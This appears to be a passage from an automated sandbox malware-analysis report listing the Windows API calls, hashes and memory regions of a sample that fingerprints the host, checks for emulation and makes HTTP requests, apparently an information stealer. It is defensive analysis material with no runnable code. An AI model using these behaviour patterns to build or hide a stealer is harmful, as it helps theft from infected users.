                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                      • String ID: @
                                      • API String ID: 3404098578-2766056989
                                      • Opcode ID: 878a90f34e096d30e7d89448c69a574e23fa6b892c1598a4a852eafceae412f3
                                      • Instruction ID: 198c605b63268064c6e3321c907f2861ebf30c0b4d659eb8408d118d522d9ff8
                                      • Opcode Fuzzy Hash: 878a90f34e096d30e7d89448c69a574e23fa6b892c1598a4a852eafceae412f3
                                      • Instruction Fuzzy Hash: 88014BF0D44308BAEB10DFE0DD4ABAEBB78AB14705F20849EE604B62D0D6785581875D
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417FC7
                                      • HeapAlloc.KERNEL32(00000000), ref: 00417FCE
                                      • RegOpenKeyExA.KERNEL32(80000002,02E38478,00000000,00020119,?), ref: 00417FEE
                                      • RegQueryValueExA.KERNEL32(?,02EB5AF0,00000000,00000000,000000FF,000000FF), ref: 0041800F
                                      • RegCloseKey.ADVAPI32(?), ref: 00418022
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocCloseOpenProcessQueryValue
                                      • String ID:
                                      • API String ID: 3466090806-0
                                      • Opcode ID: 7a9c0ba5048ddb27ec33de3f8be0389340df971bddb9b3c1683f2c2c2fb7b9da
                                      • Instruction ID: 7366865410052b2090c980cb0782fc53e6cc971cacc9a0cbb18d91746b71e1a2
                                      • Opcode Fuzzy Hash: 7a9c0ba5048ddb27ec33de3f8be0389340df971bddb9b3c1683f2c2c2fb7b9da
                                      • Instruction Fuzzy Hash: 981151B1E45209EBD700CF94DD45FBFBBB9EB48B11F10421AF615A7280E77959048BA2
                                      APIs
                                        • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                        • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                        • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                        • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                        • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                        • Part of subcall function 00417690: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004176D2
                                        • Part of subcall function 00417690: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041770F
                                        • Part of subcall function 00417690: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417793
                                        • Part of subcall function 00417690: HeapAlloc.KERNEL32(00000000), ref: 0041779A
                                        • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                        • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                        • Part of subcall function 00417820: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417834
                                        • Part of subcall function 00417820: HeapAlloc.KERNEL32(00000000), ref: 0041783B
                                        • Part of subcall function 00417950: GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,00000000,0041DEF0,000000FF,?,00411EE9,00000000,?,02EB5D70,00000000,?), ref: 00417982
                                        • Part of subcall function 00417950: IsWow64Process.KERNEL32(00000000,?,?,?,?,?,00000000,0041DEF0,000000FF,?,00411EE9,00000000,?,02EB5D70,00000000,?), ref: 00417989
                                        • Part of subcall function 004179E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417A10
                                        • Part of subcall function 004179E0: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417A17
                                        • Part of subcall function 004179E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00417A2F
                                        • Part of subcall function 00417A70: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416CCB), ref: 00417AA0
                                        • Part of subcall function 00417A70: HeapAlloc.KERNEL32(00000000,?,?,?,00416CCB), ref: 00417AA7
                                        • Part of subcall function 00417A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00417ABF
                                        • Part of subcall function 00417B10: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420DE8,00000000,?), ref: 00417B40
                                        • Part of subcall function 00417B10: HeapAlloc.KERNEL32(00000000,?,?,?,?,00420DE8,00000000,?), ref: 00417B47
                                        • Part of subcall function 00417B10: GetLocalTime.KERNEL32(?,?,?,?,?,00420DE8,00000000,?), ref: 00417B54
                                        • Part of subcall function 00417B10: wsprintfA.USER32 ref: 00417B83
                                        • Part of subcall function 00417BC0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,02EB5750,00000000,?,00420DF8,00000000,?,00000000,00000000), ref: 00417BF3
                                        • Part of subcall function 00417BC0: HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,02EB5750,00000000,?,00420DF8,00000000,?,00000000,00000000,?), ref: 00417BFA
                                        • Part of subcall function 00417BC0: GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,02EB5750,00000000,?,00420DF8,00000000,?,00000000,00000000,?), ref: 00417C0D
                                        • Part of subcall function 00417C90: GetUserDefaultLocaleName.KERNEL32(00000055,00000055,?,?,?,00000000,00000000,?,02EB5750,00000000,?,00420DF8,00000000,?,00000000,00000000), ref: 00417CC5
                                        • Part of subcall function 00417D20: GetKeyboardLayoutList.USER32(00000000,00000000,004205B7), ref: 00417D71
                                        • Part of subcall function 00417D20: LocalAlloc.KERNEL32(00000040,?), ref: 00417D89
                                        • Part of subcall function 00417D20: GetKeyboardLayoutList.USER32(?,00000000), ref: 00417D9D
                                        • Part of subcall function 00417D20: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417DF2
                                        • Part of subcall function 00417D20: LocalFree.KERNEL32(00000000), ref: 00417EB2
                                        • Part of subcall function 00417F10: GetSystemPowerStatus.KERNEL32(?), ref: 00417F3D
                                      • GetCurrentProcessId.KERNEL32(00000000,?,02EB5B30,00000000,?,00420E0C,00000000,?,00000000,00000000,?,02EB5810,00000000,?,00420E08,00000000), ref: 004122CE
                                        • Part of subcall function 00419600: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00419614
                                        • Part of subcall function 00419600: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00419635
                                        • Part of subcall function 00419600: CloseHandle.KERNEL32(00000000), ref: 0041963F
                                        • Part of subcall function 00417F90: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417FC7
                                        • Part of subcall function 00417F90: HeapAlloc.KERNEL32(00000000), ref: 00417FCE
                                        • Part of subcall function 00417F90: RegOpenKeyExA.KERNEL32(80000002,02E38478,00000000,00020119,?), ref: 00417FEE
                                        • Part of subcall function 00417F90: RegQueryValueExA.KERNEL32(?,02EB5AF0,00000000,00000000,000000FF,000000FF), ref: 0041800F
                                        • Part of subcall function 00417F90: RegCloseKey.ADVAPI32(?), ref: 00418022
                                        • Part of subcall function 004180F0: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00418159
                                        • Part of subcall function 004180F0: GetLastError.KERNEL32 ref: 00418168
                                        • Part of subcall function 00418060: GetSystemInfo.KERNEL32(00420E14), ref: 00418090
                                        • Part of subcall function 00418060: wsprintfA.USER32 ref: 004180A6
                                        • Part of subcall function 00418290: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,02EB5870,00000000,?,00420E14,00000000,?,00000000), ref: 004182C0
                                        • Part of subcall function 00418290: HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,02EB5870,00000000,?,00420E14,00000000,?,00000000,00000000), ref: 004182C7
                                        • Part of subcall function 00418290: GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 004182E8
                                        • Part of subcall function 00418290: __aulldiv.LIBCMT ref: 00418302
                                        • Part of subcall function 00418290: __aulldiv.LIBCMT ref: 00418310
                                        • Part of subcall function 00418290: wsprintfA.USER32 ref: 0041833C
                                        • Part of subcall function 00418950: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E10,00000000,?), ref: 004189BF
                                        • Part of subcall function 00418950: HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E10,00000000,?), ref: 004189C6
                                        • Part of subcall function 00418950: wsprintfA.USER32 ref: 004189E0
                                        • Part of subcall function 004184B0: RegOpenKeyExA.KERNEL32(00000000,02EB3650,00000000,00020019,00000000,004205BE), ref: 00418534
                                        • Part of subcall function 004184B0: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 004185B6
                                        • Part of subcall function 004184B0: wsprintfA.USER32 ref: 004185E9
                                        • Part of subcall function 004184B0: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0041860B
                                        • Part of subcall function 004184B0: RegCloseKey.ADVAPI32(00000000), ref: 0041861C
                                        • Part of subcall function 004184B0: RegCloseKey.ADVAPI32(00000000), ref: 00418629
                                        • Part of subcall function 00418810: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205BF), ref: 0041885A
                                        • Part of subcall function 00418810: Process32First.KERNEL32(?,00000128), ref: 0041886E
                                        • Part of subcall function 00418810: Process32Next.KERNEL32(?,00000128), ref: 00418883
                                        • Part of subcall function 00418810: CloseHandle.KERNEL32(?), ref: 004188F1
                                      • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 004128AB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$Process$Alloc$Closewsprintf$NameOpenlstrcpy$InformationLocal$CurrentHandleInfoKeyboardLayoutListLocaleProcess32StatusSystemTimeUser__aulldivlstrcatlstrlen$ComputerCreateDefaultDirectoryEnumErrorFileFirstFreeGlobalLastLogicalMemoryModuleNextPowerProcessorQuerySnapshotToolhelp32ValueVolumeWindowsWow64Zone
                                      • String ID: aA
                                      • API String ID: 2204142833-2414573348
                                      • Opcode ID: 4620e36a10f7a5a598fb0a1a1229184c3baad3b87cc3beda2ebe37e6ef882961
                                      • Instruction ID: 4f79722ab1709daed6719e9a1a5ed0a8a89ced1591e892962b9c5cf472760468
                                      • Opcode Fuzzy Hash: 4620e36a10f7a5a598fb0a1a1229184c3baad3b87cc3beda2ebe37e6ef882961
                                      • Instruction Fuzzy Hash: 9872ED72D15058AACB19FB91ECA1EEE733DAF10314F5042DFB11662056EF343B98CA69
                                      APIs
                                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,02EB2270,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 00416D6A
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416D88
                                      • CloseHandle.KERNEL32(00000000), ref: 00416D99
                                      • Sleep.KERNEL32(00001770), ref: 00416DA4
                                      • CloseHandle.KERNEL32(?,00000000,?,02EB2270,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 00416DBA
                                      • ExitProcess.KERNEL32 ref: 00416DC2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                      • String ID:
                                      • API String ID: 941982115-0
                                      • Opcode ID: d5e1fa89fe7d5108738a6f3c91913c7127e375a878f495bce87c5ec22f141b40
                                      • Instruction ID: 8f12dcb365d2fb80f233d5f720f30c8ba2b1eb9bf2b810d0bdce41a90926edfe
                                      • Opcode Fuzzy Hash: d5e1fa89fe7d5108738a6f3c91913c7127e375a878f495bce87c5ec22f141b40
                                      • Instruction Fuzzy Hash: 46F08230B48219EFEB00BBA0EC0ABFE7375AF04705F15061BB516A51D0DBB89681CA5B
                                      APIs
                                        • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                        • Part of subcall function 004062D0: InternetOpenA.WININET(00420DFF,00000001,00000000,00000000,00000000), ref: 00406331
                                        • Part of subcall function 004062D0: StrCmpCA.SHLWAPI(?,02EB7320), ref: 00406353
                                        • Part of subcall function 004062D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406385
                                        • Part of subcall function 004062D0: HttpOpenRequestA.WININET(00000000,GET,?,02EB6960,00000000,00000000,00400100,00000000), ref: 004063D5
                                        • Part of subcall function 004062D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0040640F
                                        • Part of subcall function 004062D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406421
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415478
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                      • String ID: ERROR$ERROR
                                      • API String ID: 3287882509-2579291623
                                      • Opcode ID: 243c3ba6e4d083e298a404233cb39cc9641087610bb8f65c24bf72cb52f6143f
                                      • Instruction ID: 220a7b172e2a8d17d187597bbcd3bb12c7c2fc56be07e285a6b23909b802432f
                                      • Opcode Fuzzy Hash: 243c3ba6e4d083e298a404233cb39cc9641087610bb8f65c24bf72cb52f6143f
                                      • Instruction Fuzzy Hash: 6E118630A01048ABCB14FF65EC52EED33399F50354F40456EF90A5B4A2EF38AB95C65E
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416CCB), ref: 00417AA0
                                      • HeapAlloc.KERNEL32(00000000,?,?,?,00416CCB), ref: 00417AA7
                                      • GetComputerNameA.KERNEL32(?,00000104), ref: 00417ABF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocComputerNameProcess
                                      • String ID:
                                      • API String ID: 4203777966-0
                                      • Opcode ID: bd395e3c10b2e9752f846d4f55ec5ddb2c88ed80ced139acaed9e3128f7bbde2
                                      • Instruction ID: 80df14e24d55d9e77394b8c0389cbc6422d62e125eda11eaf6ba37d1415b345b
                                      • Opcode Fuzzy Hash: bd395e3c10b2e9752f846d4f55ec5ddb2c88ed80ced139acaed9e3128f7bbde2
                                      • Instruction Fuzzy Hash: D60181B1E08359ABC700CF98DD45BAFBBB8FB04751F10021BF505E2280E7B85A408BA2
                                      APIs
                                      • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00419614
                                      • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00419635
                                      • CloseHandle.KERNEL32(00000000), ref: 0041963F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseFileHandleModuleNameOpenProcess
                                      • String ID:
                                      • API String ID: 3183270410-0
                                      • Opcode ID: 38bec2c2861d1061a7e63eb7caa5b35248e167512e01a3ac08b79c0d7adc0fad
                                      • Instruction ID: 8add19ce2c94a4db983c162c5ea883653429c1f160fd421327fd5bffa921fc45
                                      • Opcode Fuzzy Hash: 38bec2c2861d1061a7e63eb7caa5b35248e167512e01a3ac08b79c0d7adc0fad
                                      • Instruction Fuzzy Hash: 95F03A7490120CEFDB14DBA4DD4AFEA7778BB08300F004599FA1997280E6B06E84CB95
                                      APIs
                                      • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416CBC), ref: 0040112B
                                      • VirtualAllocExNuma.KERNEL32(00000000,?,?,00416CBC), ref: 00401132
                                      • ExitProcess.KERNEL32 ref: 00401143
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$AllocCurrentExitNumaVirtual
                                      • String ID:
                                      • API String ID: 1103761159-0
                                      • Opcode ID: 11ea4e03c837496306c88658afd9ed440fb44e3d5b70bdcdd02673fa8ef340ef
                                      • Instruction ID: f86d798d442288df0e099431c712f1cdbed5da6d4770a056b1c254158006f616
                                      • Opcode Fuzzy Hash: 11ea4e03c837496306c88658afd9ed440fb44e3d5b70bdcdd02673fa8ef340ef
                                      • Instruction Fuzzy Hash: DCE0E670D8A30CFBE7105BA19D0AB4D77689B04B15F101156F709BA5D0D6B92640565D
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02E3A6CE
                                      • Module32First.KERNEL32(00000000,00000224), ref: 02E3A6EE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089738538.0000000002E39000.00000040.00000020.00020000.00000000.sdmp, Offset: 02E39000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2e39000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFirstModule32SnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 3833638111-0
                                      • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                      • Instruction ID: a4a8aea3d668ee91f030740b5784e4bfb9aebb06e8e1d850524a49c1e7819bd6
                                      • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                      • Instruction Fuzzy Hash: 1FF096351407116FD7213BF5DC8CB6E76E8BF8972AF105538E683912C0DB74E885CA61
                                      APIs
                                      • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416CB7,00420AF3), ref: 0040116A
                                      • ExitProcess.KERNEL32 ref: 0040117E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitInfoProcessSystem
                                      • String ID:
                                      • API String ID: 752954902-0
                                      • Opcode ID: 0911bb23926965f42d7cc1f5d35b7be77a6f2882a7c2442a84db88c73d1ba697
                                      • Instruction ID: 7de8415141d8ede1392e5156f4839a36e98c975bb62c62673ce2cce929d499c4
                                      • Opcode Fuzzy Hash: 0911bb23926965f42d7cc1f5d35b7be77a6f2882a7c2442a84db88c73d1ba697
                                      • Instruction Fuzzy Hash: 9ED05E74D0530DABCB04DFE09D496DDBB79BB0C315F041656DD0572240EA305441CA66
                                      APIs
                                      • SetErrorMode.KERNEL32(00000400,?,?,048C0223,?,?), ref: 048C0E19
                                      • SetErrorMode.KERNEL32(00000000,?,?,048C0223,?,?), ref: 048C0E1E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorMode
                                      • String ID:
                                      • API String ID: 2340568224-0
                                      • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                      • Instruction ID: 974fbefe494e3660b2d81de3df00582b3900c2d20be45972480681e4c8a0c2b8
                                      • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                      • Instruction Fuzzy Hash: 2DD01231545128B7D7003AD4DC09BCD7B1CDF05BA2F008411FB0DD9080C770954046E5
                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040114E,?,?,00416CBC), ref: 004010B3
                                      • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040114E,?,?,00416CBC), ref: 004010F7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Virtual$AllocFree
                                      • String ID:
